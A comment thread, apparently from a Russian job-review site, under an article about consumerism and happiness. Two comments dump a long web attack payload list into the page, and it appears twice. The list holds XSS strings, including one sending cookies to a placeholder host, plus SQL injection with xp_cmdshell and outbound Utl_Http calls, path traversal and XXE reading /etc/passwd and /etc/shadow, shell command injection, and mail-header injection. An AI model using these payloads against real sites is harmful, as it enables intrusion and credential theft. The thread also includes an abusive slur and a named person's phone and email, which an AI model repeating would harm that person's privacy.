DATAFORMATAS="HTML"/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xml ID=IXC![CDATA[IMG SRC="javas]]![CDATA[cript:alert('XSS');"]] xml SRC="xsstest.xml" ID=I/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xssscriptalert('XSS')/script/vulnerable youremail%0aBcc:youremail youremail%0aCc:youremail youremail%0d%0aBcc:youremail youremail%0d%0aCc:youremail = =' =-- =; ?x= ?x=" ?x= ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| FALSE NULL PRINT PRINT @@variable TRUE XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` ['] ['] \ \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \0 \00 \00\00 \00\00\00 \0\0 \0\0\0 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \n/usr/bin/id; \n/usr/bin/id\n \n/usr/bin/id| \nid; \nid\n \nid| \nnetstat -a%\n \t \u003C \u003c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * \x3C \x3D \x27 \x3D \x3B' \x3c ^' ^' ` `/usr/bin/id` `dir` `id` `perl -e 'print ".%p" x 80'`%n `ping 127.0.0.1` a);/usr/bin/id a);/usr/bin/id; a);/usr/bin/id| a);id a);id; a);id| a)|/usr/bin/id a)|/usr/bin/id; a)|id a)|id; a;/usr/bin/id a;/usr/bin/id; a;/usr/bin/id| a;id a;id; a;id| http://yourservername/ id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- response.write 111111 something%00html update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y xsstest xsstest%00"' {'} |/usr/bin/id |/usr/bin/id| |id |id; |id| |ls |ls -la |nid\n |usr/bin/id\n || || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & ||/usr/bin/id; ||/usr/bin/id| }
vuasia2017-02-27 19:03:37
! !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() " " or "a"="a " or "x"="x " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- "' or 1 --'" ") or ("a"="a "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////dev/random""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM ""file:////etc/passwd""]foo&xxe;/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[' or 1=1 or ''=']]/foo" "?xml version=""1.0"" encoding=""ISO-8859-1""?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo" "HTML xmlns:xss?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""xss:xssXSS/xss:xss/HTML" "xml ID=""xss""IBIMG SRC=""javas!-- --cript:alert('XSS')""/B/I/xmlSPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN" "xml ID=IXC![CDATA[IMG SRC=""javas]]![CDATA[cript:alert('XSS');""]]" "script" "scriptalert(1)/script "scriptdocument.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie/script "xxxPyyy "\t" # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %01%02%03%04%0a%0d%0aADSF %08x %0A/usr/bin/id %0A/usr/bin/id%0A %0Aid %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %oa ping -n 30 127.0.0.1 %0a %0a id %0a %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+youremail%0aRCPT+TO:+youremail%0aDATA%0aFrom:+youremail%0aTo:+youremail%0aSubject:+tst%0afoo%0a%2e%0a %0d %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+youremail%0d%0aRCPT+TO:+youremail%0d%0aDATA%0d%0aFrom:+youremail%0d%0aTo:+youremail%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a %0d%0aX-Injection-Header:%20AttackValue %20 %20$(sleep%2050) %20'sleep%2050' %20d %20n %20s %20x %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %2500 %250a %26 %27%20or%201=1 %28 %29 %2A %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %60 %7C %7f %99999999999s %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %ff %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x & & id & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & &#0000060 < &#000060 < &#00060 < &#0060 < &#060 < 
 

 
 
 &#60 < &#X000003C < &#X000003c < &#X00003C < &#X00003c < &#X0003C < &#X0003c < &#X003C < &#X003c < &#X03C < &#X03c < &#X3C < &#X3c < &#x000003C < &#x000003c < &#x00003C < &#x00003c < &#x0003C < &#x0003c < &#x003C < &#x003c < &#x03C < &#x03c < &#x3C < &#x3c < &LT < ' '%20OR &id &lt < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <>"'%;)(&+ &ltscript&gtalert(document.cookie);&ltscript&gtalert &ltscript&gtalert(document.cookie);/script ";id" ' ' (select top 1 ' -- ' ; ' UNION ALL SELECT ' UNION SELECT ' or ''=' ' or '1'='1 ' or '1'='1'-- ' or 'x'='x ' or (EXISTS) ' or 0=0 # ' or 0=0 -- ' or 1 in (@@version)-- ' or 1=1 or ''=' ' or 1=1-- ' or a=a-- ' or uid like '% ' or uname like '% ' or user like '% ' or userid like '% ' or username like '% '%20or%201=1 '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '';!--"XSS=&{()} ') or ('a'='a '-- '; exec master..xp_cmdshell '; exec xp_regread '; waitfor delay '0:30:0'-- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))///SCRIPT!--SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT=&{} ';shutdown-- 'scriptalert(document.cookie);/script 'scriptalert(document.cookie)/script 'hi' or 'x'='x'; 'or select * 'sqlattempt1 '||UTL_HTTP.REQUEST '||Utl_Http.request('http://yourservername') from dual-- ( (') (sqlattempt2) ) )))))))))) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| + +%00 ,@variable - -- --'; --sp_password -1 -1.0 -2 -20 -268435455 ..%%35%63 ..%%35c ..%25%35%63 ..%255c ..%5c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 ..%u2216 ../ ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ..\ ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / /%00/ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow // //* /etc/passwd /etc/shadow /index.html|id| 0 0 or 1=1 00 0xfffffff 1 1 or 1 in (@@version)-- 1 or 1=1-- 1.0 1; waitfor delay '0:30:0'-- 1;SELECT%20* 1||Utl_Http.request('http://yourservername') from dual-- 2 2147483647 268435455 65536 :response.write 111111 ; ; ping 127.0.0.1 ; ;/usr/bin/id\n ;echo 111111 ;id ;id; ;id\n ;id| ;ls -la ;system('/usr/bin/id') ;system('cat%20/etc/passwd') ;system('id') ;|/usr/bin/id| script / script ! ![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]] ![CDATA[scriptvar n=0;while(true){n++;}/script]] /foo scriptalert("XSS");///script "'%;)(&+ ? ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////dev/random"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/passwd"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file:////etc/shadow"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?!DOCTYPE foo [!ELEMENT foo ANY!ENTITY xxe SYSTEM "file://c:/boot.ini"]foo&xxe;/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[' or 1=1 or ''=']]/foo ?xml version="1.0" encoding="ISO-8859-1"?foo![CDATA[]]SCRIPT![CDATA[]]alert('XSS');![CDATA[]]/SCRIPT![CDATA[]]/foo HTML xmlns:xss?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"xss:xssXSS/xss:xss/HTML IMG """SCRIPTalert("XSS")/SCRIPT" IMG DYNSRC="javascript:alert('XSS')" IMG LOWSRC="javascript:alert('XSS')" IMG SRC="  javascript:alert('XSS');" IMG SRC="jav ascript:alert('XSS');" IMG SRC="jav	ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="jav
ascript:alert('XSS');" IMG SRC="javascript:alert('XSS')" IMG SRC="javascript:alert('XSS');" IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 IMG SRC=javascript:alert('XSS') IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 IMG SRC=JaVaScRiPt:alert('XSS') IMG SRC=`javascript:alert("'XSS'")` IMG SRC=javascript:alert("XSS") IMG SRC=javascript:alert('XSS') IMG SRC=javascript:alert(String.fromCharCode(88,83,83)) IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)' IMG%20SRC='javasc ript:alert(document.cookie)' IMG%20SRC='javascript:alert(document.cookie)' foo/foo name','')); phpinfo(); exit;/*/name scriptalert("XSS")/script scriptalert(document.cookie)/script xml ID="xss"IB<IMG SRC="javas!-- --cript:alert('XSS')">/B/I/xmlSPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"/SPAN/C/X/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xml ID=IXC![CDATA[IMG SRC="javas]]![CDATA[cript:alert('XSS');"]] xml SRC="xsstest.xml" ID=I/xmlSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML/SPAN xssscriptalert('XSS')/script/vulnerable youremail%0aBcc:youremail youremail%0aCc:youremail youremail%0d%0aBcc:youremail youremail%0d%0aCc:youremail = =' =-- =; ?x= ?x=" ?x= ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| FALSE NULL PRINT PRINT @@variable TRUE XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` ['] ['] \ \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \0 \00 \00\00 \00\00\00 \0\0 \0\0\0 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \n/usr/bin/id; \n/usr/bin/id\n \n/usr/bin/id| \nid; \nid\n \nid| \nnetstat -a%\n \t \u003C \u003c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * \x3C \x3D \x27 \x3D \x3B' \x3c ^' ^' ` `/usr/bin/id` `dir` `id` `perl -e 'print ".%p" x 80'`%n `ping 127.0.0.1` a);/usr/bin/id a);/usr/bin/id; a);/usr/bin/id| a);id a);id; a);id| a)|/usr/bin/id a)|/usr/bin/id; a)|id a)|id; a;/usr/bin/id a;/usr/bin/id; a;/usr/bin/id| a;id a;id; a;id| http://yourservername/ id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- response.write 111111 something%00html update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y xsstest xsstest%00"' {'} |/usr/bin/id |/usr/bin/id| |id |id; |id| |ls |ls -la |nid\n |usr/bin/id\n || || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & ||/usr/bin/id; ||/usr/bin/id| }
размышлятель2016-12-12 15:27:55
подобные заявления порождают депрессию у сторонников такой теории. Значит красивые женщины и признание в обществе уже не нужны? Жрать, трахаться и доминировать - как ни прискорбно но этого всегда будет хотеть мужчина. Кушать вкусчнее, женщину по симпатичнее и фанток/сторонников/подчиненных побольше. А для этого надо перестать быть лентяем и вкалывать. Описанный вами путь я прошел... Вернусь на правильный, уж простите.
виктор2016-10-24 16:50:41
привет
Яна2016-06-07 16:29:16
Удалите эмейл https://orabote.biz/feedback/list/company/1060882
Яна2016-06-07 16:28:52
Удалите эмейл https://orabote.biz/feedback/list/company/1060882
Яна2016-06-07 15:00:45
https://orabote.biz/feedback/list/company/1060882 Удалите еэмейл с данного отзыва.
Петро2016-04-08 09:44:01
Админ вонючий пидорас!
Нелли Картун2016-03-31 17:45:23
Уважаемая администрация сайта "orabote.biz", меня зовут Нелли Картун, я являюсь руководителем подразделения поиска и привлечения персонала в Компании "BAUER". Учитывая специфику моей деятельности, для меня Ваш сайт является одним из лучших способов получения обратной связи от уволенных сотрудников. На днях зашла на Ваш сайт и обнаружила, что 43 страницы отзывов (написанные буквально в одно время) не соответствуют специфике нашей Компании!!! Отзывы автоматически добавлялись в одно и то же время и обсуждается в них не наша Компания! Большинство отзывов написаны из тех регионов в которых мы не работаем и НИКОГДА НЕ РАБОТАЛИ. Я настоятельно прошу удалить 42 страницы отзывов, которые были добавлены ошибочно! Прошу в ближайшее время связаться со мной по номеру +3 8(066) 989 42 56. Почта kartun.nelli@bauer-in.com Надеюсь на понимание и скорейшее удаление "ошибочных" отзывов. С уважением, Нелли Картун
Андрей2015-06-11 15:39:00
Интересно написано, отчасти я согласен со многим. Хочу добавить от себя еще пару мыслей: спросите себя - что мне нужно для счастья? Ответы будут очень разные, но в итоге, все можно свести к простым вещам - для счастья мне нужны положительные эмоции от всего происходящего. Рассуждаем - насколько более счастлив обладатель новенького Порше в сравнении с владельцем первой тойоты 90х годов? Идем дальше - я считаю что неторопливо гулять по городу пешком приносит гораздо больше положительных эмоции нежели делать то же самое на дорогом велосипеде. Искренне любить и быть любимым можно в независимости от стройности ног подруги и ее мастерства макияжа. Можно слушать музыку и испытывать при этом такую палитру эмоций, которую никогда не получить от путевки в Италию например. Мир построен так что умный ищет радость во всем, цепляя по пути и негатив, глупый же тупо живет и считает что нравится всем и иметь все самое дорогое - это и есть счастье. А главное - что самое дорогое в жизни человека, я гораздо богаче основной массы толстосумов со страниц Forbes - эта единица ВРЕМЯ, его не купишь. Есть человек который за 8 часовой рабочий день без особого напряга получает з/п 30000р - у него каждый день останется куча ресурса в виде свободного времени и главное - свободного пространства для заполнения себя различными вещами нематериального мира, время на хобби, на маленькие радости. И есть манагер с планами и постоянной дебиторской задолженностью получающий за 10,11 часовой рабочий день 60000 - у него есть машина в кредит, ипотека и выходные с семьей в ИКЕА, а также 2х недельный отпуск 1раз в год и приобретенное ЧСВ. Хочу процитировать высказывание Марка Твена: На смертном одре мы будем жалеть лишь о двух вещах: что мало любили и мало путешествовали. По настоящему путешествовать можно лишь будчи не привязанным к какому то месту или работе, по настоящему любить можно не имея виллы и кабриолета.
Алексей2015-06-09 13:51:51
Неожиданный поворот от маркетингового расследования к потугам на философию Диогена (?) и спор с Платоном... ) Дружище! Живите на помойке! Вот вам и дом и пища! А работать и вовсе не обязательно.
Кот Баюн2015-06-04 19:58:02
Автор написал интересную мысль, но не учел, что потребности у всех разные. Бомжи, живущие на вокзале, тоже наверное довольны жизнью по своему. Автор не хочет до их уровня опускаться? А почему? Крайний энафизм тоже имеет право на существование. У меня вот работа - мое хобби, программирование. Мне нравится работать и зарабатывать для своей семьи, помогать родителям. Люблю кататься на велосипеде. Автор не в курсе, сколько стоит велосипед сейчас? Хобби тоже денег стоит, если это не хождение по улице. Друг автора хочет пинать болт весь день? Да на здоровье. Почему другие должны хотеть жить так же?
Игорь2015-06-04 00:52:01
Когда Ваш город обстреляют. Для Вас неважно это российские военные или украинские, а вы просидите пару месяцев в подвале, без света, воды, средств связи. Пищу по очереди готовить во дворе 9 этажки, на костре .... Понимаеш, что без многого можно жить.....автор прав.....Была жизнь, а щас......одна ........ну все как всегда .......через......
Алексей2015-05-31 12:59:50
В чем-то я с автором статьи согласен, и дело тут не в том сколько автор зарабатывает или какой-либо другой человек. Много ли нужно человеку для счастья никто никогда не задумывался? На эту тему можно развернуть такую дискуссию что мама не горюй, действительно, бывает даже так, что человек работает, тратит огромное количество времени на свою работу и даже зарабатывает неплохие деньги, но при этом тратит нечто очень ценное в своей жизни. Существуют и пассивные источники финансов, я гарантирую это, на которые можно позволить себе все тоже самое но при существенно меньшем затрачивании времени ))))) а потратить его на что-нибудь действительно важно в жизни человека, ведь все мы живем только один раз. Беда в том, что не всем такое доступно, так как люди рождаются в не равных слоях общества и условиях это к сожалению правда. Не соглашусь, пожалуй, с историей про coca cola если человек действительно покупает, то что ему не нужно это и называется потреблятство или вообще какое-то психическое отклонение. А если мне нравится эта вода? но в данный момент мне нужна только одна баночка, почему не взять две по цене одной? одну можно употребить, а вторую положить в холодильник про запас. Теперь про iphone, не вижу ничего плохого в том, что люди юзают данную технику если она действительно по делу нравится, я, например, могу себе это позволить, но не буду, так как привык прикольные штуки собирать себе сам, технологии уже давно не такая роскошь как это было раньше, есть полно производителей в том числе и Китайских которые делают вещи не то что не хуже, а иногда даже лучше и в разы дешевле, любой смартфон при наличии прямых рук можно настроить так как тебе нравится и хочется. Короче говоря, аппаратура должна быть качественной и не дорогой, а не продавать кусок платы по цене четырех таких, а то и больше, но это только мое мнение я его никому не навязываю
Борис ! 2015-05-23 16:42:32
Мне нравится , тема есть и правду видно .
Сергей2015-05-23 06:25:04
Сейчас это у вы не айфоны детка! А дорогущее жильё на которое накопить практически не реально так как инфляция сжирает накопления=ипотеки!вот так пол жизни большинству и определили рабство!!!хотя дальше пенсия а ты сам знаешь какая она в России:)
Цыбульский Артур Валерьевич2015-05-19 06:10:25
3 факта об авторе судя по статье: 1. У автора маленькая ЗП. 2. У автора нет семьи. 3. Автор пытается себя оправдать. В общем, у космического существа не должно быть Земных потребностей ;)
uchastnik2015-05-18 16:13:00
Так деньги и не должны залеживаться. Это всего лишь эквивалент затратам и инструмент обмена, а не инструмент сбережения.
Ольга2015-05-13 19:09:16
Уже не раз написали, всё дело в комфорте. А границы комфорта у всех разные. И автору надо было начать с себя, где живет, кем работает, сколько зарабатывает и на что тратит. Что его устраивает ЗП в 20 т.р. все поняли. Я предпочитаю ориентироваться на себя, а не того дядю, тётю, коллегу и т.д. Но общество, оно всегда таким было. Многие считают, если у тебя нет айфона, ты лох. Нет машины, нищеброд. У меня много знакомых, потративших кучу денег на непонятные и не нужные лично мне вещи. Мне всё равно как они живут. Все всё знают, ну или о многом догадываются. Принцип "купил-выбросил-купил" уже известен. Я не лезу в чужую жизнь и не учу как надо. И я не образец для подражания, такая высокодуховная бабенка. Пусть каждый живет как хочет и считает для себя приемлемым. Хочет мадам туфли за ползарплаты, пусть покупает. Четкий пацан обвесился кредитами на ТВ, машину, телефончик - на здоровье. И не надо никого учить/лечить. Вот что неприятно. Многие норовят залезть тебе в душу, кошелек, постель. Люди! Ау! Какого хрена?!
Наталья Ивановна2015-05-11 15:45:00
Полностью согласна со статьей. Мы сами создали это ненормальное общество потребления. Сколько денег действительно нужно человеку для нормальной жизни? Согласна, что качественные вещи иметь приятнее. Но скажите мне в чем разница: я покупаю качественные кожаные туфли за 3500 руб. модные и удобные, а рядом "барби" в туфлях от 15000 и выше (из дорогой клеенки)? А чтобы быть не как все! Сколько денег нужно человеку в день на еду (типа могу себе позволить) и в тоже время не разжиреть? Нашу фирму жутко лихорадило целый месяц. Директор (он же собственник) был на встрече таких же рабовладельцев. Самый крутой хвастался весь вечер покупкой новой яхты (3-ей по счету). А наш почувствовал себя простым лузером - у него не было ни одной. БОГАТЫЕ ТОЖЕ ПЛАЧУТ! Может хватит этих понтов? Все равно найдется кто-то покруче чем ты. Да и утомительно это. Лучше просто заниматься тем, что интересно и проводить свое свободное время в компании незацикленных на "бабках" друзей. Остальное все суета...
Вадос2015-05-10 16:38:24
Больше работаешь-меньше думаешь.Всем им,людям сверху,выгодно,чтоб человек меньше думал.
Александра2015-05-07 18:05:19
"Если бы вы не тратили столько денег, чтобы показать другим, что у вас много денег... то у вас было бы больше денег". Насчет планшетов и айфонов согласна с автором на сто процентов. У меня есть два iPod, потому что адекватной альтернативы этому продукту Apple я еще не встречала, тогда как iPhone - штука, что называется, overpriced, и уже ставшая символом бахатства среди школьников. Взрослый человек пойдет и купит себе самсунг или htc, и будет рад функционалу и соотношению цена - качество. Функциональный ультрабук может стоить и дороже планшета (но это смотря как поискать), зато он может гораздо больше (но его не откроешь в метрошечке, чтобы поиграть в игрушечку, так что пролетает). Есть то, что можно назвать гадостью или бесполезной роскошью, и это будет объективно. Как та же кола или шуба в относительно теплом климате. Сюда же давайте отнесем привычку есть в ресторанах, когда приготовить дома то же самое не составляет труда. Также - Есть то, что может считаться роскошью наполовину - те же помидоры с Даниловского рынка (см. комментарий от зарабатывающего 150 чувака). Просто сравнивать даже не хочется с пластмассой из магазинов, и раз в неделю себе позволить их можно даже при зп 50. А также, удобная и недешевая обувь служит гораздо дольше, чем купленное на сезон в Центро. А также, путешествия (да даже в соседний город выбраться посмотреть на памятники архитектуры) могут быть затратными. Посыл в целиком хорош для одиноких молодых людей, у которых есть своё жилье и нет родителей, которым надо помогать, и детей, которых нужно содержать. Иначе появляются траты, которые невозможно игнорировать. Нужно жильё. Машина как средство передвижения, не атрибут роскоши. Добровольное медицинское страхование. Гениальная идея про то, что дети могут обходиться без подгузников и детского питания, ведь наши деды-бабы делали так же, не проканывает в городе с плохой экологией - какое, блин, яблоко мы там сорвем?! Всё зависит от обстоятельств, всё-таки.
Квазимода2015-05-02 00:31:29
